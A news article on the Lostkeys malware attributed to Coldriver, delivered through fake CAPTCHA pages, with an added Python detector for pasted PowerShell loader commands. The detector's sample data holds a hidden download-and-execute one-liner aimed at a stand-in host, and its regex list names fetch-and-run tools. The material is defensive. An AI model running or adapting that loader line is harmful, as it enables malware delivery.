Capabilities and Safety Tips

HIGHLIGHTS

Lostkeys is delivered through fake CAPTCHA pages that lure users into copying and running attacker-supplied PowerShell commands.

The malware specifically targets prominent individuals, including government officials and journalists.

Google has integrated this threat into Safe Browsing and is advising users to activate Enhanced Safe Browsing for added security.

Google’s Threat Intelligence Group (GTIG) has identified a new malware family it calls Lostkeys, attributed to the Russian state-sponsored hacking group Coldriver, which is also tracked as UNC4057, Star Blizzard and Callisto. According to Google’s findings, Lostkeys steals files from a set of targeted directories on the infected device and sends system information back to the attackers.

The malware was observed in campaigns in January, March and April 2025, marking a notable expansion of Coldriver’s tooling. Previously, the group focused primarily on credential phishing against NATO governments, non-governmental organizations (NGOs) and former intelligence officials. It has now added direct malware deployment aimed at data theft.

How Does Lostkeys Function?

Lostkeys is delivered through a multi-stage infection chain. It begins with a fake CAPTCHA page that instructs the visitor to copy a PowerShell command and run it themselves, so the initial execution comes from the user rather than from a browser exploit. That command fetches the next stages from a remote server, the last of which installs Lostkeys. Once running, Lostkeys collects files from a set of targeted directories, gathers and transmits system information, and includes anti-analysis checks, such as refusing to run on virtual machines, to evade detection.
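The delivery step above leaves a characteristic trace on the endpoint: a shell launched from the desktop (explorer.exe) with hidden-window, no-profile and download-and-execute flags. As an added example, not code from the original article or from Google’s report, here is a Python heuristic that scores constructed Windows process-creation events for that pattern. The event layout, sample command lines, indicator list and score threshold are all assumptions made for illustration.

```python
"""
Heuristic detector for the fake-CAPTCHA delivery step: the victim pastes
an attacker-supplied PowerShell one-liner, so a desktop shell (explorer.exe)
spawns a hidden PowerShell that fetches the next stage. Event layout, sample
events, indicators and threshold are constructed for this example.
"""
import re
from dataclasses import dataclass, field

# Parents that mean "a person typed or pasted this from the desktop"
# (e.g. the Win+R Run dialog) rather than a script host or developer tool.
INTERACTIVE_PARENTS = {"explorer.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line traits typical of pasted loader one-liners. Each hit adds one
# point; the threshold below is a tunable assumption, not a published rule.
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "no_profile":    re.compile(r"-no(p|profile)\b", re.I),
    "bypass_policy": re.compile(r"-e(p|xecutionpolicy)\s+bypass\b", re.I),
    "encoded_cmd":   re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "web_fetch":     re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget|"
        r"downloadstring|net\.webclient)\b", re.I),
    "inline_exec":   re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "remote_url":    re.compile(r"https?://[^\s'\"]+", re.I),
}


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon EID 1 / Security 4688 style)."""
    parent_image: str
    image: str
    command_line: str


@dataclass
class Verdict:
    suspicious: bool
    score: int
    reasons: list = field(default_factory=list)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(ev: ProcessEvent, threshold: int = 3) -> Verdict:
    """Score one event; suspicious when the score reaches the threshold."""
    if basename(ev.image) not in SHELL_IMAGES:
        return Verdict(False, 0, ["not a shell host"])
    score, reasons = 0, []
    if basename(ev.parent_image) in INTERACTIVE_PARENTS:
        score += 1
        reasons.append("shell launched from explorer.exe (pasted command)")
    for name, rx in INDICATORS.items():
        if rx.search(ev.command_line):
            score += 1
            reasons.append(name)
    # Download paired with in-memory execution is the loader pattern itself,
    # so weight it enough to trip the threshold without hidden-window flags.
    if "web_fetch" in reasons and "inline_exec" in reasons:
        score += 1
        reasons.append("download-and-execute chain")
    return Verdict(score >= threshold, score, reasons)


def triage(events):
    """Return (index, Verdict) for every event that scores as suspicious."""
    return [(i, v) for i, v in ((i, analyze(e)) for i, e in enumerate(events))
            if v.suspicious]


# Constructed sample events (no real campaign data).
SAMPLE_EVENTS = [
    # The pasted "CAPTCHA verification" one-liner: hidden PowerShell that
    # downloads a second stage and runs it in memory.
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        'powershell -w hidden -nop -c "iex (iwr https://example.invalid/stage2 -UseBasicParsing).Content"',
    ),
    # Benign: a user checking the date from a Run-dialog PowerShell.
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell -Command Get-Date",
    ),
    # Benign: a developer downloading a release from an editor terminal.
    ProcessEvent(
        r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
        r"C:\Program Files\PowerShell\7\pwsh.exe",
        "pwsh -c Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip",
    ),
]

if __name__ == "__main__":
    for i, v in triage(SAMPLE_EVENTS):
        print(f"event {i}: score={v.score} reasons={v.reasons}")
```

Only the first sample trips the threshold; the interactive parent alone (event 2) or a download without in-memory execution from a developer tool (event 3) does not. In practice the same logic is run over Sysmon or Security 4688 process-creation logs, and PowerShell script block logging (Event 4104) gives the decoded command when the one-liner is base64-encoded.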

Google has specifically warned that the targets of Coldriver’s campaigns are typically high-profile individuals, including government officials, journalists, think tanks, and NGOs. There is also evidence that the group has targeted individuals with connections to Ukraine.

“Coldriver generally seeks out high-profile targets via personal email addresses or NGO domains. They have a track record of stealing credentials, and once they gain access to an account, they exfiltrate emails and harvest contact lists from the compromised profiles. In particular instances, Coldriver even delivers malware to infiltrate target devices, potentially accessing sensitive files contained within the system,” the company explained in their blog post.

To counter the threat, Google has added the known malicious websites, domains and files to its Safe Browsing database. It also recommends that users in high-risk categories enroll in the Advanced Protection Program, and that Enhanced Safe Browsing be enabled in Chrome for stronger protection against such threats.

The incident highlights the ongoing risk that state-sponsored malware and phishing campaigns pose to individuals in sensitive positions. Coldriver’s move from credential phishing to deploying malware for data theft is a significant shift for the sectors it targets. Users in those sectors need to remain vigilant and take the necessary precautions to protect their accounts and devices.

For individuals working within NGOs or related fields, basic controls matter: strong, unique passwords; phishing-resistant two-factor authentication (hardware security keys or passkeys rather than SMS codes); and awareness training that covers not only phishing links but also web pages that ask the reader to copy and run a command, which no legitimate CAPTCHA does. Organizations should also budget for regular security audits and timely software updates to close vulnerabilities that attackers could exploit.

As attacker tradecraft continues to evolve, staying informed about current threats and defensive practices is essential for safeguarding sensitive data and the integrity of organizational communications.
